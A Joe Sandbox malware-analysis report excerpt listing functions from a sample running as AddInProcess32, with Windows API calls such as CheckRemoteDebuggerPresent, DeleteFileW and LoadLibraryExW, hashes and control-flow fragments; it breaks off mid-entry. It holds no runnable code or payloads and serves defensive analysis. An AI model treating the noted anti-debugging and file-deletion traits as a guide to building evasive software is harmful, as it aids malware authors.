                                                                                                                                                                                                                                                    • Instruction ID: 6c3a79fc8133354d39f54efef3f32be77587d887d5a7df8ca05c5e6943864195
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 01ed59d6e6f36bc79c2650d92e80eb8efc8eba6efe12bc2a20c44446b31bb8d5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF411472D043598FCB14DFA9D8447EEBBF1AF89210F18866BD808A7252DB749945CBA0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0649DF84 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1580 649df84-649dff6 1582 649dff8-649dffe 1580->1582 1583 649e001-649e008 1580->1583 1582->1583 1584 649e00a-649e010 1583->1584 1585 649e013-649e04b 1583->1585 1584->1585 1586 649e053-649e0b2 CreateWindowExW 1585->1586 1587 649e0bb-649e0f3 1586->1587 1588 649e0b4-649e0ba 1586->1588 1592 649e100 1587->1592 1593 649e0f5-649e0f8 1587->1593 1588->1587 1594 649e101 1592->1594 1593->1592 1594->1594
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0649E0A2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1515935785.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_6490000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateWindow
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 716092398-0
                                                                                                                                                                                                                                                    • Opcode ID: 1a60b4525af1384177853f591c6a70857456512d328248e79d279e41ed86cd19
                                                                                                                                                                                                                                                    • Instruction ID: 2fe794b1104d87a50702c619214f02da591dface132d19a7b9d762949d3cce78
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a60b4525af1384177853f591c6a70857456512d328248e79d279e41ed86cd19
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4151C0B1D003599FDF15CF99C884ADEBFB5BF49310F64812AE819AB250D7719885CF90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0649DF90 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1595 649df90-649dff6 1596 649dff8-649dffe 1595->1596 1597 649e001-649e008 1595->1597 1596->1597 1598 649e00a-649e010 1597->1598 1599 649e013-649e0b2 CreateWindowExW 1597->1599 1598->1599 1601 649e0bb-649e0f3 1599->1601 1602 649e0b4-649e0ba 1599->1602 1606 649e100 1601->1606 1607 649e0f5-649e0f8 1601->1607 1602->1601 1608 649e101 1606->1608 1607->1606 1608->1608
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0649E0A2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1515935785.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_6490000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateWindow
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 716092398-0
                                                                                                                                                                                                                                                    • Opcode ID: f893d1babf5fad6038c8e7b69079fb3f4e0bcfc26e8ab3588c43cbbc45d5b8aa
                                                                                                                                                                                                                                                    • Instruction ID: cd2c8cf2aea41a5345389db6a3617116aceefe0901342859326b07bc07018d81
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f893d1babf5fad6038c8e7b69079fb3f4e0bcfc26e8ab3588c43cbbc45d5b8aa
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A941A0B1D003599FDF15CF99C884ADEBFB5BF49310F64812AE819AB210D7759845CF90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 011E70C1 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1812 11e70c1-11e714c CheckRemoteDebuggerPresent 1814 11e714e-11e7154 1812->1814 1815 11e7155-11e7190 1812->1815 1814->1815
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 011E713F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1482200127.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_11e0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3662101638-0
                                                                                                                                                                                                                                                    • Opcode ID: e887fef2fa24cce6565b5463142d8d722f61ccbde6499ad0fadc373d58203e7f
                                                                                                                                                                                                                                                    • Instruction ID: e6276204eac09ac147323eebf5a4bcf62a88aa8eda8f3282e8e4428b316cf99d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e887fef2fa24cce6565b5463142d8d722f61ccbde6499ad0fadc373d58203e7f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 642169B18002598FDB14CFA9D584BEEBBF5AF49210F14845AE854A7350D378A944CF60
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06493AD8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1824 6493ad8-6493b74 DuplicateHandle 1825 6493b7d-6493b9a 1824->1825 1826 6493b76-6493b7c 1824->1826 1826->1825
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06493B67
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1515935785.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_6490000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                                                                                                                                    • Opcode ID: a5a483bf0651f1f04bd20b2f563f5fc2b54f22fb00c39723fa54e4f47f604914
                                                                                                                                                                                                                                                    • Instruction ID: 7d93436928098caaacbb31b609568b69af13177c5fdb2d06b4dd0dcca8caa6a8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5a483bf0651f1f04bd20b2f563f5fc2b54f22fb00c39723fa54e4f47f604914
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E321E4B5D002089FDB10CFAAD884AEEBBF5EB48310F14801AE959A7350D374A940CFA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06493AE0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06493B67
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1515935785.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_6490000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                                                                                                                                    • Opcode ID: 09008a84cf144a2503ab2633b0d7e111127e3c1f586c898f0a8b91cc9736d0f9
                                                                                                                                                                                                                                                    • Instruction ID: a805bda2042fdb2a8d9e5d80a6d5f492e9437202664c29bfe213adab45be8192
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09008a84cf144a2503ab2633b0d7e111127e3c1f586c898f0a8b91cc9736d0f9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E121E2B5D003089FDB10CFAAD884ADEBBF9EB48320F14801AE918A7350C374A940CFA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 011E7790 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(00000000), ref: 011E88B8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1482200127.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_11e0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DeleteFile
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4033686569-0
                                                                                                                                                                                                                                                    • Opcode ID: 67dec0eb0e850748d6ac560248b6f0ff72bbb482064681aa0fe6b7a128fdcaf8
                                                                                                                                                                                                                                                    • Instruction ID: d57425082b6eb817d3f1d5dc00874f7aeb96161355144526b15f76712bba34da
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 67dec0eb0e850748d6ac560248b6f0ff72bbb482064681aa0fe6b7a128fdcaf8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 062147B1C006199BDB18CF9AD444BEEFBF4EB48310F14812AD918B7240D374A944CFE1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0649C1FA Relevance: 1.6, APIs: 1, Instructions: 58libraryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0649C079,00000800,00000000,00000000), ref: 0649C26A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1515935785.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_6490000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                                                                                                                    • Opcode ID: b0a930fd689efc4a4dfe1d5d4bb369f635d60edb69ecc0cdfd75d880163baa38
                                                                                                                                                                                                                                                    • Instruction ID: 3a1fc9f8febd8f3ab166a33bc14a0d455af82a9c5ce869ddf07440e24e09636b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b0a930fd689efc4a4dfe1d5d4bb369f635d60edb69ecc0cdfd75d880163baa38
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA1114B6D003099FDB14CFAAD844BEEFBF4EB88310F14852AE459A7200C775A545CFA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 011E8841 Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(00000000), ref: 011E88B8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1482200127.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_11e0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DeleteFile
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4033686569-0
                                                                                                                                                                                                                                                    • Opcode ID: 6b0bc74f31956808bf2bae97f891c0235b409695bbb048af5d0a55035596d7db
                                                                                                                                                                                                                                                    • Instruction ID: b73bb33aedcec7cbb7a9dd294aa321ec138e736840bcbbbdbea43fbe89b84144
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b0bc74f31956808bf2bae97f891c0235b409695bbb048af5d0a55035596d7db
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 772124B6C0061A9BDB14CF9AD544B9EFBF1EB08310F14812AD918B7340D338A944CFA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0649AD50 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0649C079,00000800,00000000,00000000), ref: 0649C26A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1515935785.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_6490000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                                                                                                                    • Opcode ID: d5a06eb2d18a48a1c5fcb89de75d027218cf087ec4d52e2572a0303cef365129
                                                                                                                                                                                                                                                    • Instruction ID: d883618607a0fa4a65e8e85a663a48b4c73ad68a6d289a76e033043b0bc1bb08
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5a06eb2d18a48a1c5fcb89de75d027218cf087ec4d52e2572a0303cef365129
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D1103B6D003098FDB20DF9AC484BDEFBF4EB48310F14842AE919A7200C375A545CFA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 011EF46A Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GlobalMemoryStatusEx.KERNELBASE ref: 011EF4D7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1482200127.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_11e0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: GlobalMemoryStatus
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1890195054-0
                                                                                                                                                                                                                                                    • Opcode ID: 75cfe51c4d38abfab23208826b8ddd53ea38798b513a38cda8125ffaee4a1c23
                                                                                                                                                                                                                                                    • Instruction ID: 6b6f67c5d11d4744fc15fa0379561ab523b7a4320cdc0c9608234d914ce2a667
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75cfe51c4d38abfab23208826b8ddd53ea38798b513a38cda8125ffaee4a1c23
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 961126B1C0065A9BDB14DF9AD444BDEFBF4EF48220F14812AE818B7240D378A945CFE1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0649BF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0649BFFE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1515935785.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_6490000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                                                                                                                                    • Opcode ID: e3a88d2cd6f789c32745207c751bcf41adb185b876c931d30d43a1e6feb364ff
                                                                                                                                                                                                                                                    • Instruction ID: bede92f455d22cdc7eb1e24a47ba1f688b0bc6ce489f38f79ce149955eb68c4f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e3a88d2cd6f789c32745207c751bcf41adb185b876c931d30d43a1e6feb364ff
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD110FB6C002498FCB20CF9AD844BDEFBF5EB88214F14842AD829A7210C375A545CFA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 069A32B0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 069A330D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1517692334.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_69a0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Initialize
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2538663250-0
                                                                                                                                                                                                                                                    • Opcode ID: 9b18766c3671a398c725f93a6464711eb4e77fb78976ae562910292d93252686
                                                                                                                                                                                                                                                    • Instruction ID: c8dee728d21a3885e9d53a78b6db8f78831d83e22430fef42135ec39d11f201f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b18766c3671a398c725f93a6464711eb4e77fb78976ae562910292d93252686
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F1145B59003088FCB20DF9AD844BDEFBF4EB48320F20841AD559A7200C775A944CFA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 069A2418 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 069A330D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1517692334.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_69a0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Initialize
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2538663250-0
                                                                                                                                                                                                                                                    • Opcode ID: 1d3adcfcb90c9ec9b675057bcd82fc7d0f5ecaefa5b352e094a66eac54f52611
                                                                                                                                                                                                                                                    • Instruction ID: cf5a1a52c402c2a649b30ecc5ee76e5932178db28fa0d08b61b50bb35145075c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d3adcfcb90c9ec9b675057bcd82fc7d0f5ecaefa5b352e094a66eac54f52611
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 911145B18043488FCB20DF9AD444BDEBBF4EB48320F20841AE959A7300C774A944CFE4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 064BB217 Relevance: 1.5, Strings: 1, Instructions: 290COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: h
                                                                                                                                                                                                                                                    • API String ID: 0-2439710439
                                                                                                                                                                                                                                                    • Opcode ID: e76bd31b1f0e55dd8e2253a369dd9b2ba0d1a5d3953883ea49f275c2a21ec97c
                                                                                                                                                                                                                                                    • Instruction ID: 03c551dc161563731ce9e4f2e127f806c8a259418b3bddca6044163fa5614c1b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e76bd31b1f0e55dd8e2253a369dd9b2ba0d1a5d3953883ea49f275c2a21ec97c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1A19370F002089FEF65DAA8D8947EFB7A6FB85310F649426E446E7781CE34DC818B61
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 064BFED8 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: |
                                                                                                                                                                                                                                                    • API String ID: 0-2343686810
                                                                                                                                                                                                                                                    • Opcode ID: 437589f05e190a45af4748e75a1b53071ac1a1564d9f647695b0f88853181d33
                                                                                                                                                                                                                                                    • Instruction ID: 2d2101ff71d6865b47b70ea8b386af088c4d0c0c684f634def64d5248c4c866d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 437589f05e190a45af4748e75a1b53071ac1a1564d9f647695b0f88853181d33
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17111C75B04214DFDB549B78D805B6EBBF6AF4C710F10846AE50ADB3A0DB759904CB90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 064BFED1 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: |
                                                                                                                                                                                                                                                    • API String ID: 0-2343686810
                                                                                                                                                                                                                                                    • Opcode ID: fd7bb5fbc512f18904e6f10d203958d6cb4e89b5a41d882a6466cbc078f04053
                                                                                                                                                                                                                                                    • Instruction ID: 5c4ac023b343095f405324932d0d0774e0f33b439ad0869cf3b31b3a71201f91
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd7bb5fbc512f18904e6f10d203958d6cb4e89b5a41d882a6466cbc078f04053
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58111975B00214DFDB549F78D919B6E7BF2AF8C710F14846AE50AEB3A0EB759900CB90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 064BCF38 Relevance: .8, Instructions: 804COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: d0236f93631baf52b718643dc556db783de4ed4da9000de4571a82c42a279dc7
                                                                                                                                                                                                                                                    • Instruction ID: 9a3c1ff4d0ba9b846feffe23effdea89c7bd039333d4f947ebdf2750b0c8bd20
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0236f93631baf52b718643dc556db783de4ed4da9000de4571a82c42a279dc7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73629D30A006098FCB55EF68D590A9EB7B2FF85304B60CA69D0069F755DB71EC86CFA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 064BACC0 Relevance: .4, Instructions: 388COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: ae9d4ef9d417830f3ea051e2b0b6295ea8a6347ba3e04047026512c9e36c28ad
                                                                                                                                                                                                                                                    • Instruction ID: 48b99c3f2db4156562aacf7d5a5bf0eaaa4f246207f1c991ce44c59e7cd246ee
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae9d4ef9d417830f3ea051e2b0b6295ea8a6347ba3e04047026512c9e36c28ad
